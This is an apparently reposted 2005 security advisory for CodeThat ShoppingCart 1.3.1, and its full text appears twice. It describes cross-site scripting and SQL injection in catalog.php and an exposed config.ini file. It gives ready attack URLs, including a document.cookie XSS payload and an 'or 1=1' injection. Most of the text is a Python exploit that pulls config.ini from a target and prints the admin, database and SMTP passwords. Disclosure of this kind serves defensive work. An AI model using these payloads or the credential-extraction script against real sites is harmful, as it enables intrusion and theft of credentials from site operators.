QUOTE
CodeThat ShoppingCart Critical information disclosure
XSS and SQL injection
vendor Url: http://www.codethat.com/shoppingcart/
advisore:http://lostmon.blogspot.com/2005/05/
codethat-shoppingcart-critical.html
vendor notifY: yes exploit available: yes
Discovered By Lostmon And icaro exploit code by icaro
CodeThat ShoppingCart contains a flaw that may lead to an
unauthorized disclosure of SQL conection data.It is possible
to gain access to plain text SQL configuration details, this
could allow a user to create a specially crafted URL to access
'config.ini' file, which may lead to a loss of confidentiality.
This flaw reveals too the adminīs username and his password
hash.(automated exploit available) and the credential for
configuration of SMTP server.
Contains a flaw too that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'id' variables upon submission to the catalog.php scripts.This
could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a loss
of integrity.
All flaws are found by Lostmon (lostmon@gmail.com)
and icaro (icaro0@gmail.com)and exploit code is coded
by icaro from http://www.badchecksum.tk
##########
versions:
##########
1.3.1
###########
Solution
###########
no solution at this time
############
Timeline
############
discovered: 6 may 2005
vendor notify: 7 may 2005
vendor response: 8 may 2005 (automated response form spamarrest)
vendor fix:
disclosure:9 may 2005
##########
examples:
Cross site scripting
http://[victim]/codethat/catalog.php?action=category_show
&id=2"><script>alert(document.cookie)</script>
###############
SQL injections
###############
http://[victim]/shoppingcart/catalog.php?action=category_show
&id=1%20or%20like%20%60a%%60
nice SQL error/response ...
umm them try to list all products:
http://[victim]shoppingcart/demo/catalog.php?action=
category_show&id=1%20or%201=1
command execution sucesfully !!!!
aparently, non critical SQL injection ,the data base only have
tree tables and no passwords or other information are stored
in the database.
Critical information disclosure
Exploit code include.
A remote user can access directly to SQL user name, password
host, and all details about SQL configuration.
A remote user can access Directly to adminīs user name and password hash.
http://[victim]/shoppingcart/config.ini
Critical information disclosure.
A remote user can access directly to SQL user name, password
host, and all details about SQL configuration.
A remote user can access Directly to adminīs user name and password hash.
A remote user can obtain information about SMTP configuration.
http://[victim]/shoppingcart/config.ini
Proof of concept automated exploit in Python
# Lostmon Dismarking tm && icaro Badchecksum tm
# Extract information tool exploit
# Coded by icaro, Discovered by lostmon && icaro
import httplib
import sys
import string
import socket
import os
def uso():
print '\n\n\nLOSTMON DISMARKING && ICARO BADCHECKSUM TEAM\n'
print 'Usage: python ' + sys.argv[0] + ' host
/directory_of_shoping_cart/\n'
print 'Example: python '+ sys.argv[0] +' www.myhost.com /shoping/\n'
def leeini(direccionweb,directorioshoping):
web=httplib.HTTP(direccionweb)
web.putrequest('GET',directorioshoping+'config.ini')
web.putheader('Host',direccionweb)
web.putheader('Accept', 'text/html')
web.putheader('Accept', 'text/plain')
web.endheaders()
errcode, errmsg, headers = web.getreply()
fichero=web.getfile()
datos=fichero.read()
f=open('tmp.txt','w')
f.write(datos)
f.close
f=open('tmp.txt','r')
lineas=f.readlines()
f.close
n=0
print 'EXTRACCION DE PASSWD DE ADMIN SHOPING CART\n'
while n<len(lineas):
if (string.find(lineas[n],'admin_username'))==0:
imprime=string.replace(lineas[n],'admin_username : string ','Login ')
print imprime
if (string.find(lineas[n],'admin_password'))==0:
imprime=string.replace(lineas[n],'admin_password : string ','Passwd ')
print imprime
n=n+1
n=0
print 'EXTRACCION DE INFORMACION DE BASE DE DATOS\n'
while n<len(lineas):
if (string.find(lineas[n],'driver : string '))==0:
imprime=string.replace(lineas[n],'driver :
string ','Tipo')
print imprime
if (string.find(lineas[n],'server : string '))==0:
imprime=string.replace(lineas[n],'server :
string ','Servidor ')
print imprime
if (string.find(lineas[n],'user : string '))==0:
imprime=string.replace(lineas[n],'user : string
','Usuario ')
print imprime
if (string.find(lineas[n],'password : string '))==0:
imprime=string.replace(lineas[n],'password :
string ','Passwd ')
print imprime
if (string.find(lineas[n],'database : string '))==0:
imprime=string.replace(lineas[n],'database :
string ','Base de datos ')
print imprime
n=n+1
n=0
print 'EXTRACCION DE INFORMACION DEL SERVIDOR SMTP\n'
while n<len(lineas):
if (string.find(lineas[n],'checkout_email : string '))==0:
imprime=string.replace(lineas[n],'checkout_email : string ','Email
del admin ')
print imprime
if (string.find(lineas[n],'from_name : string '))==0:
imprime=string.replace(lineas[n],'from_name :
string ','Nombre')
print imprime
if (string.find(lineas[n],'smtp_host : string '))==0:
imprime=string.replace(lineas[n],'smtp_host :
string ','Host ')
print imprime
if (string.find(lineas[n],'smtp_username : string '))==0:
imprime=string.replace(lineas[n],'smtp_username
: string ','Usuario ')
print imprime
if (string.find(lineas[n],'smtp_password : string '))==0:
imprime=string.replace(lineas[n],'smtp_password
: string ','Passwd ')
print imprime
n=n+1
if len(sys.argv)==3:
leeini(sys.argv[1],sys.argv[2])
os.remove('tmp.txt')
else:
uso()
end ##############
XSS and SQL injection
vendor Url: http://www.codethat.com/shoppingcart/
advisore:http://lostmon.blogspot.com/2005/05/
codethat-shoppingcart-critical.html
vendor notifY: yes exploit available: yes
Discovered By Lostmon And icaro exploit code by icaro
CodeThat ShoppingCart contains a flaw that may lead to an
unauthorized disclosure of SQL conection data.It is possible
to gain access to plain text SQL configuration details, this
could allow a user to create a specially crafted URL to access
'config.ini' file, which may lead to a loss of confidentiality.
This flaw reveals too the adminīs username and his password
hash.(automated exploit available) and the credential for
configuration of SMTP server.
Contains a flaw too that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'id' variables upon submission to the catalog.php scripts.This
could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a loss
of integrity.
All flaws are found by Lostmon (lostmon@gmail.com)
and icaro (icaro0@gmail.com)and exploit code is coded
by icaro from http://www.badchecksum.tk
##########
versions:
##########
1.3.1
###########
Solution
###########
no solution at this time
############
Timeline
############
discovered: 6 may 2005
vendor notify: 7 may 2005
vendor response: 8 may 2005 (automated response form spamarrest)
vendor fix:
disclosure:9 may 2005
##########
examples:
Cross site scripting
http://[victim]/codethat/catalog.php?action=category_show
&id=2"><script>alert(document.cookie)</script>
###############
SQL injections
###############
http://[victim]/shoppingcart/catalog.php?action=category_show
&id=1%20or%20like%20%60a%%60
nice SQL error/response ...
umm them try to list all products:
http://[victim]shoppingcart/demo/catalog.php?action=
category_show&id=1%20or%201=1
command execution sucesfully !!!!
aparently, non critical SQL injection ,the data base only have
tree tables and no passwords or other information are stored
in the database.
Critical information disclosure
Exploit code include.
A remote user can access directly to SQL user name, password
host, and all details about SQL configuration.
A remote user can access Directly to adminīs user name and password hash.
http://[victim]/shoppingcart/config.ini
Critical information disclosure.
A remote user can access directly to SQL user name, password
host, and all details about SQL configuration.
A remote user can access Directly to adminīs user name and password hash.
A remote user can obtain information about SMTP configuration.
http://[victim]/shoppingcart/config.ini
Proof of concept automated exploit in Python
# Lostmon Dismarking tm && icaro Badchecksum tm
# Extract information tool exploit
# Coded by icaro, Discovered by lostmon && icaro
import httplib
import sys
import string
import socket
import os
def uso():
print '\n\n\nLOSTMON DISMARKING && ICARO BADCHECKSUM TEAM\n'
print 'Usage: python ' + sys.argv[0] + ' host
/directory_of_shoping_cart/\n'
print 'Example: python '+ sys.argv[0] +' www.myhost.com /shoping/\n'
def leeini(direccionweb,directorioshoping):
web=httplib.HTTP(direccionweb)
web.putrequest('GET',directorioshoping+'config.ini')
web.putheader('Host',direccionweb)
web.putheader('Accept', 'text/html')
web.putheader('Accept', 'text/plain')
web.endheaders()
errcode, errmsg, headers = web.getreply()
fichero=web.getfile()
datos=fichero.read()
f=open('tmp.txt','w')
f.write(datos)
f.close
f=open('tmp.txt','r')
lineas=f.readlines()
f.close
n=0
print 'EXTRACCION DE PASSWD DE ADMIN SHOPING CART\n'
while n<len(lineas):
if (string.find(lineas[n],'admin_username'))==0:
imprime=string.replace(lineas[n],'admin_username : string ','Login ')
print imprime
if (string.find(lineas[n],'admin_password'))==0:
imprime=string.replace(lineas[n],'admin_password : string ','Passwd ')
print imprime
n=n+1
n=0
print 'EXTRACCION DE INFORMACION DE BASE DE DATOS\n'
while n<len(lineas):
if (string.find(lineas[n],'driver : string '))==0:
imprime=string.replace(lineas[n],'driver :
string ','Tipo')
print imprime
if (string.find(lineas[n],'server : string '))==0:
imprime=string.replace(lineas[n],'server :
string ','Servidor ')
print imprime
if (string.find(lineas[n],'user : string '))==0:
imprime=string.replace(lineas[n],'user : string
','Usuario ')
print imprime
if (string.find(lineas[n],'password : string '))==0:
imprime=string.replace(lineas[n],'password :
string ','Passwd ')
print imprime
if (string.find(lineas[n],'database : string '))==0:
imprime=string.replace(lineas[n],'database :
string ','Base de datos ')
print imprime
n=n+1
n=0
print 'EXTRACCION DE INFORMACION DEL SERVIDOR SMTP\n'
while n<len(lineas):
if (string.find(lineas[n],'checkout_email : string '))==0:
imprime=string.replace(lineas[n],'checkout_email : string ','Email
del admin ')
print imprime
if (string.find(lineas[n],'from_name : string '))==0:
imprime=string.replace(lineas[n],'from_name :
string ','Nombre')
print imprime
if (string.find(lineas[n],'smtp_host : string '))==0:
imprime=string.replace(lineas[n],'smtp_host :
string ','Host ')
print imprime
if (string.find(lineas[n],'smtp_username : string '))==0:
imprime=string.replace(lineas[n],'smtp_username
: string ','Usuario ')
print imprime
if (string.find(lineas[n],'smtp_password : string '))==0:
imprime=string.replace(lineas[n],'smtp_password
: string ','Passwd ')
print imprime
n=n+1
if len(sys.argv)==3:
leeini(sys.argv[1],sys.argv[2])
os.remove('tmp.txt')
else:
uso()
end ##############
Link is unavailable
